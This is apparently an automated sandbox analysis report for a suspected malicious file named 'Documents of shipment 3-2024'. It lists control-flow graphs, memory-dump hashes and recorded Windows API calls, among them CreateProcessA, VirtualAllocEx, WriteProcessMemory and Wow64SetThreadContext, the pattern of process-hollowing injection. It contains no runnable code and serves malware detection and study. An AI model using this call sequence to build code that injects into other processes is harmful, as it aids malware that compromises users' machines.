1153->1084 1162 2287c57-2287c73 1153->1162 1154->1153 1156->1157 1163 2287cc2 1156->1163 1160 2287d2d-2287d31 1157->1160 1161 2287d26-2287d2b 1157->1161 1173 22880ab-22880b2 1158->1173 1159->1173 1160->1084 1167 2287d37-2287d3f 1160->1167 1166 2287d93-2287d9a 1161->1166 1162->1084 1169 2287c79-2287c87 1162->1169 1164 2287cc7-2287cd5 1163->1164 1164->1084 1170 2287cdb-2287cf0 1164->1170 1174 2287d9c-2287daa 1166->1174 1175 2287e02-2287e22 1166->1175 1167->1084 1172 2287d45-2287d52 1167->1172 1169->1148 1169->1149 1170->1084 1177 2287cf6-2287d03 1170->1177 1172->1084 1178 2287d58-2287d65 1172->1178 1174->1175 1176 2287dac-2287dc4 1174->1176 1193 2287e25-2287e4e 1175->1193 1186 2287df0-2287e00 call 22801d8 1176->1186 1187 2287dc6 1176->1187 1177->1084 1180 2287d09-2287d10 1177->1180 1178->1084 1182 2287d6b-2287d88 1178->1182 1180->1157 1180->1164 1182->1166 1186->1193 1190 2287dc9-2287dcb 1187->1190 1190->1084 1196 2287dd1-2287ddf 1190->1196 1194 2287ed8-2287eeb 1193->1194 1195 2287e54-2287ed5 1193->1195 1200 2287f4a-2287f54 1194->1200 1201 2287eed-2287f26 1194->1201 1195->1194 1196->1084 1199 2287de5-2287dee 1196->1199 1199->1186 1199->1190 1201->1200 1211 2287f28-2287f44 1201->1211 1211->1200 1217->1218 1219 2287549-2287553 1218->1219 1220 2287545-2287547 1218->1220 1221 2287555-228756b 1219->1221 1220->1221 1223 228756d-228756f 1221->1223 1224 2287571-2287579 1221->1224 1227 228757b-2287580 1223->1227 1224->1227 1228 2287582-228758d 1227->1228 1229 2287593-22875ba 1227->1229 1228->1229 1233 22875bc-22875c8 1229->1233 1234 22875ee-22875f8 1229->1234 1233->1234 1237 22875ca-22875d7 1233->1237 1235 22875fa 1234->1235 1236 2287601-2287689 1234->1236 1235->1236 1247 22876cb-22876d9 1236->1247 1248 228768b-22876c9 1236->1248 1240 22875d9-22875db 1237->1240 1241 22875dd-22875e8 1237->1241 1240->1234 1241->1234 1251 22876e4-2287723 1247->1251 1248->1251 1268 2287726 call 22883a0 1251->1268 1269 2287726 call 22883b0 1251->1269 1270 2287726 call 2288451 1251->1270 1255 228772c-22877b0 1260 22877de-22877fa 1255->1260 1261 22877b2-22877dc 1255->1261 1264 2287808-2287809 1260->1264 1265 22877fc 1260->1265 1261->1260 1264->1075 1265->1264 1268->1255 1269->1255 1270->1255
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LRq$\sq
                                              • API String ID: 0-576302416
                                              • Opcode ID: 105debc93fab49a73bed59eb566331050d8f50eafe5b52c651d771240bce18b0
                                              • Instruction ID: c7306cc53e44215210a12b8541fe09e201c88e19b26df879b281ab37143e7128
                                              • Opcode Fuzzy Hash: 105debc93fab49a73bed59eb566331050d8f50eafe5b52c651d771240bce18b0
                                              • Instruction Fuzzy Hash: F3C17F75A1121A8FDB14DF79D844AAEB7F2BFC8305F118529E405EB398DB34AE41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Xq
                                              • API String ID: 0-599127549
                                              • Opcode ID: 28be2a67549a8892d5bafe693b737d8bc1a600dfb4bb35913ff68580fb61d3ca
                                              • Instruction ID: ccd9092909ef4531c71ee25cda33a4cb0f96999273d8a4af033268549b399680
                                              • Opcode Fuzzy Hash: 28be2a67549a8892d5bafe693b737d8bc1a600dfb4bb35913ff68580fb61d3ca
                                              • Instruction Fuzzy Hash: 3DB1C231740A04CFDB14EF29D854A6E77B6BF89312B18816DE80ADB369CB70DC45CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: 8d84ec2a629f52dcd81c7c0f21d1fa9dacbf72cde107173a120fd687bcb6327c
                                              • Instruction ID: 3e086a60e003516b83e580a3c07b51abd293a1416517b37f207255503b60af9f
                                              • Opcode Fuzzy Hash: 8d84ec2a629f52dcd81c7c0f21d1fa9dacbf72cde107173a120fd687bcb6327c
                                              • Instruction Fuzzy Hash: 3751D135B1011A8FDB14DBADE8806AEB7F2FFC9210B54857AD109D7359DB30EC418B82
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 72c4bce1b1f4f57f2c6421c48c22c17eb08ac68c1bdfde34b9feaf84fd95784c
                                              • Instruction ID: c4d7442f8a9eaca5dab53b6193381556ea3443f6dfaeb011aea2180f0d9a51b5
                                              • Opcode Fuzzy Hash: 72c4bce1b1f4f57f2c6421c48c22c17eb08ac68c1bdfde34b9feaf84fd95784c
                                              • Instruction Fuzzy Hash: 0FC1B971B017048FEBA9EF75C850BAEB7E7AF88700F14946AD146CB294DB34E801CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a549fce5f82598973658fecc838cd21116f6439fd92db8ae194d2335cf326a89
                                              • Instruction ID: b44a167aa68ebe14a110cfacea366fd3160d63df3a6445c6ff5aad80cbd51a1e
                                              • Opcode Fuzzy Hash: a549fce5f82598973658fecc838cd21116f6439fd92db8ae194d2335cf326a89
                                              • Instruction Fuzzy Hash: FF817032F212299FD714EB69D840B5EB7F3AFC8711F5A8064E405EB399DA75EC018B81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db94fdf6178131693c5111fe015541943f6fb8c35a9881fd53a972114cd85859
                                              • Instruction ID: c79f7f4e25881189bfdf1b877171f3f57431cb64804d887585541c7a45235ba2
                                              • Opcode Fuzzy Hash: db94fdf6178131693c5111fe015541943f6fb8c35a9881fd53a972114cd85859
                                              • Instruction Fuzzy Hash: FB614C32F216298FD754DB69CC40B5EB7E3AFC8711F5A8164D405AB3A9DE75EC018B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 454 8781b4a-8781b4b 455 8781b4e-8781b6b 454->455 456 8781bbf-8781cc0 454->456 455->456 467 8781cea 456->467 468 8781cc2-8781cce 456->468 469 8781cf0-8781dc5 467->469 470 8781cd8-8781cde 468->470 471 8781cd0-8781cd6 468->471 480 8781def 469->480 481 8781dc7-8781dd3 469->481 472 8781ce8 470->472 471->472 472->469 484 8781df5-8781e1e 480->484 482 8781ddd-8781de3 481->482 483 8781dd5-8781ddb 481->483 485 8781ded 482->485 483->485 503 8781e23 call 87866f8 484->503 504 8781e23 call 8787a6a 484->504 505 8781e23 call 8787d10 484->505 506 8781e23 call 8787d00 484->506 507 8781e23 call 8787d90 484->507 508 8781e23 call 8786642 484->508 509 8781e23 call 87865e4 484->509 510 8781e23 call 87866b7 484->510 485->484 487 8781e29-8781f44 call 8788525 512 8781f4a call 8784138 487->512 513 8781f4a call 8784128 487->513 498 8781f50-8781f5f 514 8781f62 call 8788de0 498->514 515 8781f62 call 8788dd0 498->515 499 8781f68-8781f8e 502 8781f93-8781f9b 499->502 503->487 504->487 505->487 506->487 507->487 508->487 509->487 510->487 512->498 513->498 514->499 515->499
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $q$$q$$q$$q
                                              • API String ID: 0-4102054182
                                              • Opcode ID: d9c98d0047680893a801ac6d5408fe1252b7f1b267558071eb5ec7c9e824b650
                                              • Instruction ID: 35947887f69b28f9ab0fc9d28ea71ae1004dc3260058d00817cdb9bb7c41f113
                                              • Opcode Fuzzy Hash: d9c98d0047680893a801ac6d5408fe1252b7f1b267558071eb5ec7c9e824b650
                                              • Instruction Fuzzy Hash: 6AB18074A00228CFDB64DF64C895BA9BBB2FB88310F5084E9A90DA7355DA315E82DF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1314 8781bb1-8781cc0 1324 8781cea 1314->1324 1325 8781cc2-8781cce 1314->1325 1326 8781cf0-8781dc5 1324->1326 1327 8781cd8-8781cde 1325->1327 1328 8781cd0-8781cd6 1325->1328 1337 8781def 1326->1337 1338 8781dc7-8781dd3 1326->1338 1329 8781ce8 1327->1329 1328->1329 1329->1326 1341 8781df5-8781e1e 1337->1341 1339 8781ddd-8781de3 1338->1339 1340 8781dd5-8781ddb 1338->1340 1342 8781ded 1339->1342 1340->1342 1360 8781e23 call 87866f8 1341->1360 1361 8781e23 call 8787a6a 1341->1361 1362 8781e23 call 8787d10 1341->1362 1363 8781e23 call 8787d00 1341->1363 1364 8781e23 call 8787d90 1341->1364 1365 8781e23 call 8786642 1341->1365 1366 8781e23 call 87865e4 1341->1366 1367 8781e23 call 87866b7 1341->1367 1342->1341 1344 8781e29-8781f44 call 8788525 1369 8781f4a call 8784138 1344->1369 1370 8781f4a call 8784128 1344->1370 1355 8781f50-8781f5f 1371 8781f62 call 8788de0 1355->1371 1372 8781f62 call 8788dd0 1355->1372 1356 8781f68-8781f8e 1359 8781f93-8781f9b 1356->1359 1360->1344 1361->1344 1362->1344 1363->1344 1364->1344 1365->1344 1366->1344 1367->1344 1369->1355 1370->1355 1371->1356 1372->1356
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1250543560.0000000008780000.00000040.00000800.00020000.00000000.sdmp, Offset: 08780000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_8780000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $q$$q
                                              • API String ID: 0-3126353813
                                              • Opcode ID: 9dc185ee68eb1cac6c02f91f44ebbf3bd301d091c972e68a59a8262e0e271531
                                              • Instruction ID: 5addfa570fea89a6c473d27c7554514666bcdeb4b2dd7636cc070a367e38f5b0
                                              • Opcode Fuzzy Hash: 9dc185ee68eb1cac6c02f91f44ebbf3bd301d091c972e68a59a8262e0e271531
                                              • Instruction Fuzzy Hash: 87A17174A00228CFDB64DF64C895BEDBBB2FB88310F5084E9A90DA7355DA315E82DF51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 067B276E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: b784caa6a49f5e4519760f7072a2689967477fda363ba93785f0ad3b740bb5e0
                                              • Instruction ID: 72d79f6ed5a3e4b06a436471c102f3a5c1bb944f39ce4ce55b20bc9d2b38a2a7
                                              • Opcode Fuzzy Hash: b784caa6a49f5e4519760f7072a2689967477fda363ba93785f0ad3b740bb5e0
                                              • Instruction Fuzzy Hash: F2A18B70D01319DFEB64DFA8C840BEEBBB2BF48304F048169D828A7255DB749A81CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 067B276E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 335b06d7d84d164d29438c284b08b5e55ad5fe38d09ed164426ead8b303ed21e
                                              • Instruction ID: f9440c70396dab3ac3a403f295939b478c92fc56a9fb1797811be2aad2860bc3
                                              • Opcode Fuzzy Hash: 335b06d7d84d164d29438c284b08b5e55ad5fe38d09ed164426ead8b303ed21e
                                              • Instruction Fuzzy Hash: 8C917971D01319CFEB64DFA8C840BEEBBB2BF48304F048569D828A7255DB749A85CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0228D57E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: HandleModule
                                              • String ID:
                                              • API String ID: 4139908857-0
                                              • Opcode ID: f9acfdfe5d2441898483889c2bb7b1f8b7ab66dab3b2fd539615dabeb57795b9
                                              • Instruction ID: 09b33164ee464be45903f00d0c7b54f8af1f6378f198a7a98a4844a1f257c02c
                                              • Opcode Fuzzy Hash: f9acfdfe5d2441898483889c2bb7b1f8b7ab66dab3b2fd539615dabeb57795b9
                                              • Instruction Fuzzy Hash: 548133B0A11B059FD724EFB9D04475ABBF1FF88204F00892ED48A9BA84D775E949CB91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 022859A9
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: e45d7118b04377bfc9d36f63e19f7b476747fda0744f23c3dc2a3f24fe996a5d
                                              • Instruction ID: 7daca1076b3bbf4fe41b0d2ad9b2f21ef99306af2ab1c1bc1252f632c601aff0
                                              • Opcode Fuzzy Hash: e45d7118b04377bfc9d36f63e19f7b476747fda0744f23c3dc2a3f24fe996a5d
                                              • Instruction Fuzzy Hash: DA41E3B0C11719CBEB24DFA9C884BCDBBF1BF49304F60806AD418AB255DBB5A945CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • CreateActCtxA.KERNEL32(?), ref: 022859A9
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: 5c0983bbd6c5b107bd1fdf8e0fd284c017a0c7e43b3ee3d9b7220b08d288ea3b
                                              • Instruction ID: 4c3a03a6e54d501133a12d94937a4e3e787299e5232582cf490cfe9d574c4888
                                              • Opcode Fuzzy Hash: 5c0983bbd6c5b107bd1fdf8e0fd284c017a0c7e43b3ee3d9b7220b08d288ea3b
                                              • Instruction Fuzzy Hash: 7D4113B0C10719CBEB24DFA9C884BCDBBF1BF49304F60806AD418AB255DBB5A945CF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a9d031d12681f7bc0dbf88962e63b0815a6db16ee79ffb50feb9297b8787b828
                                              • Instruction ID: 564704bb8fb2dbd0a57e01775b0be0e7e9d69e8c7c81612d3062b779d63e0168
                                              • Opcode Fuzzy Hash: a9d031d12681f7bc0dbf88962e63b0815a6db16ee79ffb50feb9297b8787b828
                                              • Instruction Fuzzy Hash: BF310FB0819749CFEF11DFE8C8847EDBBF1AF0A304F954149C045AB299C7B9A94ACB11
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 067B2340
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 84fec17843f08d24ae39c44a2d70b7797fd33d4cb2a9e5977e625e5e5bfabbdb
                                              • Instruction ID: ee1ea1715a3b408ebfb3e5b5d4aa57f4b57cb3a76802abf61ae57effc25bad73
                                              • Opcode Fuzzy Hash: 84fec17843f08d24ae39c44a2d70b7797fd33d4cb2a9e5977e625e5e5bfabbdb
                                              • Instruction Fuzzy Hash: A0214875D003198FDB10CFA9C884BEEBBF5FF48310F10842AE968A7251C7789941CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04A55FA5,?,?), ref: 04A56057
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249349167.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4a50000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: DrawText
                                              • String ID:
                                              • API String ID: 2175133113-0
                                              • Opcode ID: 1532f9efd9e984a28d0d5f0794e3ddc43adc5ebc9f9ac7d78e0ac4b55f47d46a
                                              • Instruction ID: ae8d042b84dfed7e6083c616679f45618316c884188f877df9eef5c26f76b97d
                                              • Opcode Fuzzy Hash: 1532f9efd9e984a28d0d5f0794e3ddc43adc5ebc9f9ac7d78e0ac4b55f47d46a
                                              • Instruction Fuzzy Hash: 3631EEB5D003499FDB10CF9AD980AEEBBF4EB48320F54842AE919A7210D375A944CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,04A55FA5,?,?), ref: 04A56057
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249349167.0000000004A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_4a50000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: DrawText
                                              • String ID:
                                              • API String ID: 2175133113-0
                                              • Opcode ID: b18763b5c231bdee18ef0003c7bd1845213d61f390aeb1e60d4ef528e5a168ff
                                              • Instruction ID: a043d240b115f8e5353e8080be7d646724eb834c7c519e2e89a7559d5d99ddcc
                                              • Opcode Fuzzy Hash: b18763b5c231bdee18ef0003c7bd1845213d61f390aeb1e60d4ef528e5a168ff
                                              • Instruction Fuzzy Hash: 6431EEB6D013499FDB10CF9AD980AEEBBF4AF48310F54842AE918A7310D375A944CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 067B2340
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID:
                                              • API String ID: 3559483778-0
                                              • Opcode ID: 0907a456e0b4ef864955b15e35867bda58e66decccf8dc60eaedd6f6536f6592
                                              • Instruction ID: d8018a36a0271e7651eec3a304f3e9741f82059ad7eb13e896849ff897696312
                                              • Opcode Fuzzy Hash: 0907a456e0b4ef864955b15e35867bda58e66decccf8dc60eaedd6f6536f6592
                                              • Instruction Fuzzy Hash: A6212775D003199FDB10CFAAC880BEEBBF5FF48310F148429E928A7241C7789945CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0228FBC6,?,?,?,?,?), ref: 0228FC87
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: dc912c4fb5242a0ecc1703fa9ca24d6452ae5c2a8b65753e65232d5f11457e4c
                                              • Instruction ID: 6a38d0ff87a1f71871244901e765e121ad6c2e3f39611ed47ba8f77fb81d27d8
                                              • Opcode Fuzzy Hash: dc912c4fb5242a0ecc1703fa9ca24d6452ae5c2a8b65753e65232d5f11457e4c
                                              • Instruction Fuzzy Hash: 7F21E3B59113099FDB10DFAAD984BEEBBF4EB48310F14842AE918A7350D374A940CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 067B2420
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 47a99e9af8739de745f0cf64e56d843e8693483e0a4b50e4306a73e740a9de2e
                                              • Instruction ID: f3639521d635f4508e8d92bf2da216815408a0bf6dbc161e836212c36595ca53
                                              • Opcode Fuzzy Hash: 47a99e9af8739de745f0cf64e56d843e8693483e0a4b50e4306a73e740a9de2e
                                              • Instruction Fuzzy Hash: 5D2136B1C013499FDB20DFAAC880BEEBBF5FF48310F508429E958A7241C7799941CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 067B2196
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 1b8579bb5776770125e73616bc71531e1f8f8b1ba8f29268cfe16f47363ff443
                                              • Instruction ID: c5d4aa85940f229b846397bcf7731435ff3683397cac820aa20aad9646f28538
                                              • Opcode Fuzzy Hash: 1b8579bb5776770125e73616bc71531e1f8f8b1ba8f29268cfe16f47363ff443
                                              • Instruction Fuzzy Hash: 8E2168B1D003098FDB20DFAAC885BEEBBF4EF49210F148429D969A7241C7789945CFA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 067B2420
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: MemoryProcessRead
                                              • String ID:
                                              • API String ID: 1726664587-0
                                              • Opcode ID: 83d7445aac3bb4fdb1203b0997a97e69dcae906935065d090db7375c44a61c1f
                                              • Instruction ID: 9e79c3571b7ab1b3a160a1a5241c9e81a92739749d652be699cbdcb65a2c456c
                                              • Opcode Fuzzy Hash: 83d7445aac3bb4fdb1203b0997a97e69dcae906935065d090db7375c44a61c1f
                                              • Instruction Fuzzy Hash: 6B2128B1C003599FDB10DFAAC880BEEBBF5FF48310F508429E918A7240C7789941CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 067B2196
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_67b0000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID:
                                              • API String ID: 983334009-0
                                              • Opcode ID: 3f01215e6b6f810ac5a6396849c62ff27497919b57d0c2feb37b3453f5464ff8
                                              • Instruction ID: bfa08d9f810123656a324f3856765f2a352de96278d30eeeae813c43d1ff4ee9
                                              • Opcode Fuzzy Hash: 3f01215e6b6f810ac5a6396849c62ff27497919b57d0c2feb37b3453f5464ff8
                                              • Instruction Fuzzy Hash: 6E215B71D003098FDB10DFAAC4847EEBBF5EF49310F548429D529A7241CB789945CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0228D5F9,00000800,00000000,00000000), ref: 0228D80A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: 522e9f8e559196651d0eb0a9cec53fbb84778cf3142ed6e24820bed80c41890f
                                              • Instruction ID: 8b8290a18511a837cd46d98c1ddb3e07c3f442a2f5fe717ae0d78c13569bc27c
                                              • Opcode Fuzzy Hash: 522e9f8e559196651d0eb0a9cec53fbb84778cf3142ed6e24820bed80c41890f
                                              • Instruction Fuzzy Hash: E81126B6D003099FDB10DFAAC444BDEFBF4EB88320F54842AD919A7240C3B5A945CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0228D5F9,00000800,00000000,00000000), ref: 0228D80A
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1246487720.0000000002280000.00000040.00000800.00020000.00000000.sdmp, Offset: 02280000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_2280000_Documents of shipment 3-2024.jbxd
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID:
                                              • API String ID: 1029625771-0
                                              • Opcode ID: b413a7d7d4cead70900a7e0f408289d3c8e6a84c583db6c57f51d1d88aa241e8
                                              • Instruction ID: 69ee1113ab5fec97823f4484aa5ec73bdc052f860fa45cde4b86fe5cb33c0e67
                                              • Opcode Fuzzy Hash: b413a7d7d4cead70900a7e0f408289d3c8e6a84c583db6c57f51d1d88aa241e8
                                              • Instruction Fuzzy Hash: 4E1126B6D013099FDB10DFAAD444BDEFBF4EB88310F10842AD929A7250C375A945CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 067B225E
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1249971158.00000000067B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067B0000, based on PE: false
